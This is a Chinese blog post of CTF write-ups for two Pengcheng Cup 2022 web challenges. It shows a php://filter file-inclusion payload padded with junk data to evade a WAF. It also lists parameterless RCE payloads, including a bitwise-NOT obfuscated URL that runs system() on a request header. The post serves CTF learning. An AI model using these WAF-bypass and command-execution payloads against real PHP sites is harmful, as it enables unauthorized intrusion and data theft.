鹏城杯2022部分web

已于 2023-04-25 17:46:43 修改
阅读量299 收藏 3
点赞数
分类专栏: 刷题笔记 文章标签: 经验分享 web安全 php
于 2023-04-25 17:35:04 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44640313/article/details/130362254
版权

[鹏城杯 2022]简单包含

重点:脏东西绕过

打开环境

文件包含题目,发现文件路径,尝试一下伪协议,flag=php//filter/read=convert.base64-encode/resource=/var/www/html/flag.php  

发现有WAF,可以添加脏数据,有效的绕过WAF,同时又能够成功执行命令

a=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&flag=php//filter/read=convert.base64-encode/resource=/var/www/html/flag.php

 注意添加足够多的数据才行 

[鹏城杯 2022]简单的php

(重点:关于无参数RCE的绕过和取反的学习)

资料:谭谈关于无参数RCE - 先知社区 (aliyun.com)

无字母数字webshell之提高篇 | 离别歌 (leavesongs.com)

打开环境明显的无参RCE,然后还不能有数字字母,所以这里可以用取反绕过:

 脚本【~为取反符号】

<?php
echo urlencode(~"phpinfo");
?>
思路就是通过没有参数的函数达到命令执行的目的。

end() - 将内部指针指向数组中的最后一个元素,并输出。
next() - 将内部指针指向数组中的下一个元素,并输出。
prev() - 将内部指针指向数组中的上一个元素,并输出。
reset() - 将内部指针指向数组中的第一个元素,并输出。
each() - 返回当前元素的键名和键值,并将内部指针向前移动。
current() -输出数组中的当前元素的值。
scandir()  //函数返回指定目录中的文件和目录的数组。
localeconv()   //返回一包含本地数字及货币格式信息的数组。
current()     //返回数组中的单元,默认取第一个值。
pos是current的别名
getcwd()      //取得当前工作目录
dirname()     //函数返回路径中的目录部分。
array_flip()  //交换数组中的键和值,成功时返回交换后的数组
array_rand()  //从数组中随机取出一个或多个单元
array_flip()和array_rand()配合使用可随机返回当前目录下的文件名
dirname(chdir(dirname()))配合切换文件路

几种payload

eval(hex2bin(session_id(session_start())));
 
print_r(current(get_defined_vars()));&b=phpinfo();
 
eval(next(getallheaders()));
 
var_dump(getenv(phpinfo()));
 
print_r(scandir(dirname(getcwd()))); //查看上一级目录的文件
 
print_r(scandir(next(scandir(getcwd()))));//查看上一级目录的文件

本题可以利用getallheaders函数来构造。

getallheaders返回当前请求的所有请求头信息

system(current(getallheaders()));

直接可以达到命令执行的目的

payload:

?code=[~%8C%86%8C%8B%9A%92][!%FF]([~%9C%8A%8D%8D%9A%91%8B][!%FF]([~%98%9A%8B%9E%93%93%97%9A%9E%9B%9A%8D%8C][!%FF]()));      
#大小写即可,弹药注意取反符号的携带
f:ls  #任意数字或英文都可以,执行继续找即可

注意:[!%FF]是0的意思,因为前面是个数组,取数组里面的第0项才是木马

0e1G7
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2022鹏城web
m0_54849806的博客
07-28 1649
扫描后台发现存在.git,利用githack工具拿到.git文件夹,利用gitlog查看commitid,利用gitreset--hardbe50c81b903b0005d0740d221e74c51340251bc2进行恢复拿到源码。应该是需要删除掉网站根目录下的bocai.html、bocai.png,然后再来执行,不过暂时没有删除的权限,所以应该是需要提权了。那么我们可以直接覆盖一个php文件。可以将上传的文件写入,但是还要传个id,并且最终拼接成了路径是已存在的文件。...
[鹏城 2022]简单包含
qq_73767109的博客
06-11 352
有waf,尝试着查看index.php可以正常返回加密的base64,解码后得源码。简单分析,需要满足传入有flag并且传入的字符数要>800才会满足包含条件。
NSS [鹏城 2022]简单包含
Jay17的博客
07-05 656
NSS [鹏城 2022]简单包含
鹏城-2018-note
11-05
附件
鹏城”网络安全竞赛开赛 复现真实网络靶场环境.pdf
09-20
鹏城”网络安全竞赛开赛 复现真实网络靶场环境.pdf
鹏城网安卓手机apk客户端
12-31
鹏城网是深圳最大的旅游门户网,深圳旅游,深圳景点门票,深圳一日游团购就上鹏城网,深圳旅游网涵盖深圳新闻,娱乐八卦,深圳旅游攻略,深圳同城活动,深圳公益活动,深圳打折信息,深圳美食推荐,深圳交友,深圳户外活动等....
2020年第六届鹏程语文邀请赛六年级参赛题目(有参考答案).pdf
09-27
2020年第六届鹏程语文邀请赛六年级参赛题目(有参考答案).pdf
鹏城智能体城市安全发展白皮书
06-14
鹏城智能体城市安全发展白皮书,精品一级
[鹏城 2022]简单包含 伪协议脏数据 绕过waf
ZhangAweio的博客
05-02 388
看到题目的那一刻,判断它是对 “flag”进行了过滤,所以。只要数量够多就行,不一定是 / 其他的都是可以的。
[鹏城 2022]简单包含 wp
weixin_74358176的博客
09-19 192
[鹏城 2022]简单包含 wp
[CISCN 2019华东南]Web11和[鹏城 2022]简单包含
m0_73700261的博客
04-24 177
这里的突破口在&&如果满足前边的条件了那后边就不会执行就直接进入if。所以就是我们需要传参一个要大于800个字的东西接着就能输出flag。题目打开是一个这么个界面,里边提到了一个xff的头。试着传参一个带filter协议的payload。简单来说就是需要传参一个带协议的payload。解码发现是一串代码里边是想要输出flag的条件。接着就会include你想要的文件。先使用{{7*7}}来测试一波。发现回显一段base64的代码。打开来是个蛮简单的源代码。下边还有一个这么的提示。这里过滤了一个flag。
2022鹏城CTF---Crypto wp
3tefanie丶zhou的博客
07-07 2184
【我们对别人,对这个世界,所有的误会,可能都来自三个字,”我觉得“。】
2022鹏城
unexpectedthing的博客
08-30 2265
2022鹏城
2022年第二届鹏城部分题目Writeup
个人博客:https://www.mrzry.top
08-25 3754
题目:easy_rsa、babyrsa、简单取证、baby_re、easy_sql、babybit
长城前的准备
最新发布
NYG694的博客
03-06 665
​。
buuctf刷题12(zip://包含& 取反+无参数rce & csrf & FFI扩展安全)
weixin_63231007的博客
02-19 1187
[极客大挑战 2020] Roamphp 1、2、4 rceme、5、6 flagshop、7 & 鹏程-简单php
[鹏城 2022]简单php
11-04
鹏城是一个编程比赛,2022年的题目是关于简单PHP编程。PHP是一种常用的服务器端脚本语言,用于开发动态网站和Web应用程序。 在这个比赛中,参赛者需要用PHP编写一个简单的程序。程序的要求可能包括输入一个数字,然后输出该数字的平方、判断一个数字是奇数还是偶数、计算两个数字的和等等。参赛者需要熟悉PHP基本语法和常用函数,能够正确地实现这些功能。 编写一个简单PHP程序通常包括以下几个步骤:首先,通过PHP的变量来接收输入的数据。然后,使用if-else语句或switch语句实现相应的判断和计算逻辑。最后,使用echo函数将结果输出到网页上。 参赛者需要注意代码的简洁性和效率,同时还要考虑程序的健壮性和安全性。对于错误的输入,应该能够进行合理的处理,避免程序崩溃或产生不正确的结果。此外,对于一些可能存在的安全问题,比如SQL注入攻击,参赛者应该采取相应的防护措施,确保程序的安全性。 最后,参赛者可以通过本地测试和调试来验证程序的正确性,在提交之前进行充分的测试以确保程序能够正确运行。 总而言之,鹏城2022年的PHP编程题目涉及到基本的语法和常用函数的应用,参赛者需要理解题目的要求,熟悉PHP编程,编写出高效、健壮和安全的程序。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值